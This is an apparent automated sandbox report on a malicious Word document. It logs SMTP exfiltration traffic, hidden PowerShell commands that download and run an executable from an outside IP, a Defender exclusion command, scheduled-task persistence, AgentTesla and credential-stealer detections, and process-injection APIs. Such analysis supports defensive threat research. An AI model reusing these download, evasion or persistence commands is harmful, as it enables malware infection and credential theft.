Nov 25, 2021 18:23:16.891685009 CET	587	49173	208.91.199.224	192.168.2.22	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Nov 25, 2021 18:23:16.891992092 CET	49173	587	192.168.2.22	208.91.199.224	AUTH login ZHViYWlAc2t5Y29tZXguY29t
Nov 25, 2021 18:23:17.036999941 CET	587	49173	208.91.199.224	192.168.2.22	334 UGFzc3dvcmQ6
Nov 25, 2021 18:23:17.183504105 CET	587	49173	208.91.199.224	192.168.2.22	235 2.7.0 Authentication successful
Nov 25, 2021 18:23:17.183830023 CET	49173	587	192.168.2.22	208.91.199.224	MAIL FROM:<dubai@skycomex.com>
Nov 25, 2021 18:23:17.329072952 CET	587	49173	208.91.199.224	192.168.2.22	250 2.1.0 Ok
Nov 25, 2021 18:23:17.329498053 CET	49173	587	192.168.2.22	208.91.199.224	RCPT TO:<dubai@skycomex.com>
Nov 25, 2021 18:23:17.486474991 CET	587	49173	208.91.199.224	192.168.2.22	250 2.1.5 Ok
Nov 25, 2021 18:23:17.486887932 CET	49173	587	192.168.2.22	208.91.199.224	DATA
Nov 25, 2021 18:23:17.631376982 CET	587	49173	208.91.199.224	192.168.2.22	354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:23:19.153431892 CET	587	49173	208.91.199.224	192.168.2.22	250 2.0.0 Ok: queued as 65A7C3A18B7
Nov 25, 2021 18:23:22.322994947 CET	587	49175	208.91.198.143	192.168.2.22	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:23:22.323681116 CET	49175	587	192.168.2.22	208.91.198.143	EHLO 841618
Nov 25, 2021 18:23:22.471884966 CET	587	49175	208.91.198.143	192.168.2.22	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Nov 25, 2021 18:23:22.472337961 CET	49175	587	192.168.2.22	208.91.198.143	AUTH login ZHViYWlAc2t5Y29tZXguY29t
Nov 25, 2021 18:23:22.621323109 CET	587	49175	208.91.198.143	192.168.2.22	334 UGFzc3dvcmQ6
Nov 25, 2021 18:23:22.820713997 CET	587	49175	208.91.198.143	192.168.2.22	235 2.7.0 Authentication successful
Nov 25, 2021 18:23:22.827204943 CET	49175	587	192.168.2.22	208.91.198.143	MAIL FROM:<dubai@skycomex.com>
Nov 25, 2021 18:23:22.976063967 CET	587	49175	208.91.198.143	192.168.2.22	250 2.1.0 Ok
Nov 25, 2021 18:23:22.983613014 CET	49175	587	192.168.2.22	208.91.198.143	RCPT TO:<dubai@skycomex.com>
Nov 25, 2021 18:23:23.147027016 CET	587	49175	208.91.198.143	192.168.2.22	250 2.1.5 Ok
Nov 25, 2021 18:23:23.151930094 CET	49175	587	192.168.2.22	208.91.198.143	DATA
Nov 25, 2021 18:23:23.300436974 CET	587	49175	208.91.198.143	192.168.2.22	354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:23:23.304953098 CET	49175	587	192.168.2.22	208.91.198.143	.
Nov 25, 2021 18:23:23.551043034 CET	587	49175	208.91.198.143	192.168.2.22	250 2.0.0 Ok: queued as 10FB978235B

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2556 Parent PID: 596

General

Start time:	18:21:13
Start date:	25/11/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f050000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 308 Parent PID: 2556

General

Start time:	18:21:20
Start date:	25/11/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Imagebase:	0x13f870000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.429522504.0000000000170000.00000004.00000020.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 2800 Parent PID: 2556

General

Start time:	18:21:22
Start date:	25/11/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Imagebase:	0x13f870000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.424289946.0000000000360000.00000004.00000020.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 324 Parent PID: 2556

General

Start time:	18:21:22
Start date:	25/11/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
Imagebase:	0x13f870000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: task.exe PID: 2780 Parent PID: 308

General

Start time:	18:21:28
Start date:	25/11/2021
Path:	C:\Users\user\AppData\Roaming\task.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\task.exe"
Imagebase:	0xcf0000
File size:	504832 bytes
MD5 hash:	F65B0793251364C03D06E8E7134FC21B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 2732 Parent PID: 2780

General

Start time:	18:21:32
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
Imagebase:	0x220f0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 1912 Parent PID: 2780

General

Start time:	18:21:33
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp
Imagebase:	0xe0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: task.exe PID: 572 Parent PID: 2780

General

Start time:	18:21:35
Start date:	25/11/2021
Path:	C:\Users\user\AppData\Roaming\task.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\task.exe
Imagebase:	0xcf0000
File size:	504832 bytes
MD5 hash:	F65B0793251364C03D06E8E7134FC21B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: verclsid.exe PID: 2844 Parent PID: 2556

General

Start time:	18:21:42
Start date:	25/11/2021
Path:	C:\Windows\System32\verclsid.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Imagebase:	0xffd50000
File size:	11776 bytes
MD5 hash:	3796AE13F680D9239210513EDA590E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: notepad.exe PID: 1868 Parent PID: 2556

General

Start time:	18:21:43
Start date:	25/11/2021
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Imagebase:	0xff970000
File size:	193536 bytes
MD5 hash:	B32189BDFF6E577A92BAA61AD49264E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: powershell.exe PID: 308 Parent PID: 2556 powershell.exeCOMMON

Executed Functions

Function 000007FF00270713, Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.442658719.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16f51d2372e7b12cc40fb651f964553e1a605e8310f597d885b2751b7b029f63
Instruction ID: 2515f46788f24f8a7139913619104c3683be1642bfa5a7a1dd724360996f4836
Opcode Fuzzy Hash: 16f51d2372e7b12cc40fb651f964553e1a605e8310f597d885b2751b7b029f63
Instruction Fuzzy Hash: 9141BE2150EBC68FE75357789C6A6E17FE09F17210B0E01E7D488CB1A3D958AD8DC7A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: powershell.exe PID: 2800 Parent PID: 2556 powershell.exeCOMMON

Executed Functions

Function 000007FF002706E5, Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.435620277.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 655c5528ecf8f6fe491312bef4c679beb52ec0700a70442b26964e0b44e5ca89
Instruction ID: 278dc8fd297e0af8f632688b58a652c3934406e0572d3071a610d8694fec9ba4
Opcode Fuzzy Hash: 655c5528ecf8f6fe491312bef4c679beb52ec0700a70442b26964e0b44e5ca89
Instruction Fuzzy Hash: 0551BE2150EBC28FD353573898697A17FE09F17210F1E01EBD488CF0A3D959AD99C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00271201, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.435620277.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61dca15bb1178c510dd76dc545ace268297f4586b11a2bf9338b1053e15ea05
Instruction ID: 4bbfad9265112a06b0186faccd98acb15cbd4d578fb5b612578d1b675528c19a
Opcode Fuzzy Hash: e61dca15bb1178c510dd76dc545ace268297f4586b11a2bf9338b1053e15ea05
Instruction Fuzzy Hash: 5411AE6140E3C64FE30397385C656917FB0AF47214F0E01CBE8C5CF0A3E6595A69D362

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: task.exe PID: 2780 Parent PID: 308 task.exeCOMMON

Executed Functions

Function 05270705, Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

-, xrefs: 052708CE
(, xrefs: 05270C0E

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID: ($-
API String ID: 0-2099803033
Opcode ID: e991ba45a0ba32f207f9bc51b1a5afd132be84f95d525dec1c2f6bc29057cafe
Instruction ID: 37ed8c71a5809bb972b405ba46d178f371e1b8ae8c8a3533a0d5dc083ac22050
Opcode Fuzzy Hash: e991ba45a0ba32f207f9bc51b1a5afd132be84f95d525dec1c2f6bc29057cafe
Instruction Fuzzy Hash: 0741FFB091022CDFDB60DF64CD88BE9BBB5AF59305F1080EAD509A7281DB709AC8CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05270AA2, Relevance: 2.5, Strings: 2, Instructions: 49COMMON

Download Yara Rule

Strings

&, xrefs: 05270B57
!, xrefs: 05270BD8

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID: !$&
API String ID: 0-3844837790
Opcode ID: 3d1c67165099af129d2654c6ecdccee212250b83dc00746101d982cc458a2b7e
Instruction ID: f4ab448931df997339013f6a1506157da365f63256d4da02817ed7d7566a777d
Opcode Fuzzy Hash: 3d1c67165099af129d2654c6ecdccee212250b83dc00746101d982cc458a2b7e
Instruction Fuzzy Hash: 52112634924268CFDB24DF20D898BE8BBB5BF16304F1094E6D40AA7290DB748AC4CF00

Uniqueness

Uniqueness Score: -1.00%

Function 052710EE, Relevance: 2.5, Strings: 2, Instructions: 43COMMON

Download Yara Rule

Strings

!, xrefs: 05270BD8
+, xrefs: 05271137

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID: !$+
API String ID: 0-2610621731
Opcode ID: 91d95d42d8ce21606d66e3b7486a3eb420e746be701b8964b6074643fa26bb50
Instruction ID: 4a2f0d0af6bb2724f7f9de33be4798a22e807456c142977365257c36c11ca152
Opcode Fuzzy Hash: 91d95d42d8ce21606d66e3b7486a3eb420e746be701b8964b6074643fa26bb50
Instruction Fuzzy Hash: CE11D67482826DCFDB64CF64D88CBE9BBB0BF15305F1495D6944AA7290CBB44AD4CF01

Uniqueness

Uniqueness Score: -1.00%

Function 0527134C, Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

), xrefs: 052710AF
., xrefs: 05271351

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID: )$.
API String ID: 0-3856877588
Opcode ID: 87f3ca520e9351e37f6e0ab26db9ba72ddac8995e760e78f0b5649a4e6c22785
Instruction ID: 1cf8b35c687b6b8bc8ce7161e4184f0ce8d95712f5c421c763d9807c384d1064
Opcode Fuzzy Hash: 87f3ca520e9351e37f6e0ab26db9ba72ddac8995e760e78f0b5649a4e6c22785
Instruction Fuzzy Hash: 7611DF78D25268CFCB64CF64D8987DDBBB1BF59305F20819AD849A7244DBB08AD4CF00

Uniqueness

Uniqueness Score: -1.00%

Function 0025D360, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0025D627

Memory Dump Source

Source File: 00000009.00000002.447444972.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b865a0bf09664147a87240d9445dcd615859a61253b4c529aacafa4be843670e
Instruction ID: 338f5ce62eed75d5ec582371b12f5aa05e5628e834dbe1d6273325fda3480ab3
Opcode Fuzzy Hash: b865a0bf09664147a87240d9445dcd615859a61253b4c529aacafa4be843670e
Instruction Fuzzy Hash: 46C13670D1026A8FDF20CFA4C841BEDBBB1BF49304F1095A9D919B7240DB74AA99CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0025CFC8, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0025D09B

Memory Dump Source

Source File: 00000009.00000002.447444972.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b6f22e0b2b0e2fbe97923345a1371ad1da909927b2a0a4b894f1bef4f7a9668c
Instruction ID: dc8f9f0db46042fbc8a7db4439140d91697fa3629b70881f8d06412a871093c3
Opcode Fuzzy Hash: b6f22e0b2b0e2fbe97923345a1371ad1da909927b2a0a4b894f1bef4f7a9668c
Instruction Fuzzy Hash: 2041BAB4D002589FCF10CFA9D984AEEFBF1BB49304F20942AE814B7240D775AA56CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0025D128, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0025D1DA

Memory Dump Source

Source File: 00000009.00000002.447444972.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f53134b749dcace20f2182ab5d8ae9af349ff3547a173cc4dcca99b5918f22c4
Instruction ID: 6734b9bd3634f833f6fa998915b4978bfd5522e6c908ef251a6900794fb37531
Opcode Fuzzy Hash: f53134b749dcace20f2182ab5d8ae9af349ff3547a173cc4dcca99b5918f22c4
Instruction Fuzzy Hash: 6D4199B4D042599FCF10CFA9D884AEEFBB1BF49314F20942AE815B7200D775A956CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0025CEA0, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0025CF4A

Memory Dump Source

Source File: 00000009.00000002.447444972.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b7a1f1d4c3b9eb93523ab0535e9d25ad1b9ca566331c744e0333b51f416f7c91
Instruction ID: 1b3ca65a830853f6b1a8dc5d24288d81004b85f6e7f49a525e3bfa7507e86e62
Opcode Fuzzy Hash: b7a1f1d4c3b9eb93523ab0535e9d25ad1b9ca566331c744e0333b51f416f7c91
Instruction Fuzzy Hash: 254199B4D042589FCF10CFA9E884ADEFBB1BF49314F20941AE815B7210D775A955CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0025CD70, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0025CE1F

Memory Dump Source

Source File: 00000009.00000002.447444972.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 79b76420796140fa3215c70ba0f7050cadb973da7459d04b4b9e17061576886c
Instruction ID: 0fb3fa775eacb7ae23c645c1014843d140b3c201eb72742811e60103ba4bf6c7
Opcode Fuzzy Hash: 79b76420796140fa3215c70ba0f7050cadb973da7459d04b4b9e17061576886c
Instruction Fuzzy Hash: C641CCB4D002589FCB10CFA9D884AEEFBF1BF49314F24842AE815B7240D779A949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0025CC80, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32(?), ref: 0025CCFE

Memory Dump Source

Source File: 00000009.00000002.447444972.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b969c6bee58779ec28bb6ef276acdb3aaaf116d9a55481d92903075c64ccf06c
Instruction ID: 9d3e1a7411e5082f4278f45d057191bd7d50578b75c75c135f06b0bf773110d9
Opcode Fuzzy Hash: b969c6bee58779ec28bb6ef276acdb3aaaf116d9a55481d92903075c64ccf06c
Instruction Fuzzy Hash: B731BAB4D012189FCF14CFA9E884ADEFBB4AF49314F24942AE815B7300D775A905CF98

Uniqueness

Uniqueness Score: -1.00%

Function 05270DDA, Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

, xrefs: 05270DFD

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b1700b88543c45a15fd7dc1b70cb697c80b8cab92d8f1e0e8d625e2d016d182b
Instruction ID: 0b5f67f032525b1fd5d9a3e3d867254e1044ba59b663eb14f16a819dee62d6e9
Opcode Fuzzy Hash: b1700b88543c45a15fd7dc1b70cb697c80b8cab92d8f1e0e8d625e2d016d182b
Instruction Fuzzy Hash: 7111F274A44268CFDB24CF54EC98BD9BBB1BF58300F2080DAE909A7250CB319E80CF10

Uniqueness

Uniqueness Score: -1.00%

Function 05270A30, Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

,, xrefs: 05271299

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: ccdd37dcfc7b9c40a0464184be7fe6098929c1b1e5b4d0f485f266bd21e627dd
Instruction ID: d05a6b46202ea0c0e4544d0f23d416ccfcb0f7dbdcbd66e3849952b06abd1b3a
Opcode Fuzzy Hash: ccdd37dcfc7b9c40a0464184be7fe6098929c1b1e5b4d0f485f266bd21e627dd
Instruction Fuzzy Hash: 39011634928268CFCB64DF20E8987ECBBB5AF15315F5045EAD44AA72A0CBB44AD4CF00

Uniqueness

Uniqueness Score: -1.00%

Function 05270F6D, Relevance: 1.3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

Strings

(, xrefs: 05270C0E

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: c5d622f340ab2535e41bd352b60157f46c69caacdb15607da816b2258fa0b4a7
Instruction ID: e484bcde19fa02850a954c02c7a1be433cd336ecfd2c7526deee8eb68206353b
Opcode Fuzzy Hash: c5d622f340ab2535e41bd352b60157f46c69caacdb15607da816b2258fa0b4a7
Instruction Fuzzy Hash: 6501EA3191526C8FCB24CF64C988BEABBB1BF19308F1081C9D409A3281C7729AD5CF00

Uniqueness

Uniqueness Score: -1.00%

Function 05270CDC, Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

(, xrefs: 05270D46

Memory Dump Source

Source File: 00000009.00000002.450043992.0000000005270000.00000040.00000001.sdmp, Offset: 05270000, based on PE: false

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 85efb1043bc47f22b79039b7c34b53201e516d7c2e6a87ac8c7d58be9eeb1aa9
Instruction ID: fb029f01dfaa388f5753360a48d3c68209e90440fd90784a09c132c3cb9af63e
Opcode Fuzzy Hash: 85efb1043bc47f22b79039b7c34b53201e516d7c2e6a87ac8c7d58be9eeb1aa9
Instruction Fuzzy Hash: D001D2349042289FCB64DF64DC94BEEBBB2AF49304F1040D9D409A7291CB769ED5CF01

Uniqueness

Uniqueness Score: -1.00%

Function 0017D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.447371627.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87f789f77fcb04af8d58c58dd36128a484839d3b99746e0acd4a46c8ba5c42b5
Instruction ID: 8145ee5c4dd149b0f947856238d416e9b1946294d8ffa9ac27689b6810921dcc
Opcode Fuzzy Hash: 87f789f77fcb04af8d58c58dd36128a484839d3b99746e0acd4a46c8ba5c42b5
Instruction Fuzzy Hash: DA21F274604248DFDB14DF14E884B26BB71EF88314F34C6A9E90D4B246C37AD847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0017D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.447371627.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1d724277f660d1a4fc7e2fd431aaf278456744481944e2270f2adbc0444f599
Instruction ID: 7941207b17c64047c05ef0e913dfd6b20a3a21eb11b974c852ad0c7e7c42507a
Opcode Fuzzy Hash: b1d724277f660d1a4fc7e2fd431aaf278456744481944e2270f2adbc0444f599
Instruction Fuzzy Hash: 15215B755093C48FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0016D3B9, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.447352706.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d0861f2601bbe3025ca0535a47b9e85f9f32f64abf904e9a79a04a245cd6c5
Instruction ID: 7155f2337fb9e703e7fc840b8efe8b453693f56496415379059e9a396e148b99
Opcode Fuzzy Hash: 41d0861f2601bbe3025ca0535a47b9e85f9f32f64abf904e9a79a04a245cd6c5
Instruction Fuzzy Hash: FC012B70A0C3509AE7204B26EC84B67BB98EF41324F29C567DD044B682C779AC40C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 0016D3B8, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.447352706.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f37768c00c6d687cccf586fbc61a0efa3c6b011033704e2bc0f2b5e83c47c3b
Instruction ID: 042b90898c1d4f22e21bcb3942a7ba9431a8be96811e6306e7d93c2eef32d1a1
